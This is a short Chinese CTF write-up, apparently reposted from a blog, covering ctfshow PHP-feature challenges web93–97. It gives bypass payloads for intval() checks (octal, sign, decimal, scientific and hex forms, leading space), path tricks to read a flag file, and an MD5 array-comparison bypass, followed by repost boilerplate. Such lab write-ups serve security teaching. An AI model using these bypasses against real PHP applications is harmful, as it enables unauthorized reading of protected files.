1.WEB93 intval($num,0),0代表根据变量类型进行使用哪一种进制进行取整 可以使用8进制,正负数,小数点 payload: 010574 +4476.0 4476.0 2.web9
intval($num,0),0代表根据变量类型进行使用哪一种进制进行取整
可以使用8进制,正负数,小数点
payload:
010574
+4476.0
4476.0
过滤了0,不能使用8进制了,还可以使用小数点,正负数等
payload:
4476.0
+4476.0
%20010574
intval绕过方法:
intval('4476.0')===4476 小数点 intval('+4476.0')===4476 正负号intval('4476e0')===4476 科学计数法intval('0x117c')===4476 16进制intval('010574')===4476 8进制intval(' 010574')===4476 8进制+空格
有过滤了点,小数点法用不了了,可以使用空格加八进制数绕过
payload:
%20010574
可以使用目录分隔符绕过,相对路径和绝对路径都可以
payload:
./flag.PHP
/var/www/html/flag.php
数字不相等,但是md5值相等
MD5处理数组返回的都是null
payload:
a[]=1&b[]=2
来源地址:https://blog.csdn.net/m0_62207170/article/details/131313128
--结束END--
本文标题: ctfshow web入门 php特性 web93-97
本文链接: https://lsjlt.com/news/392299.html(转载时请注明来源链接)
有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
回答
回答
回答
回答
回答
回答
回答
回答
回答
回答
0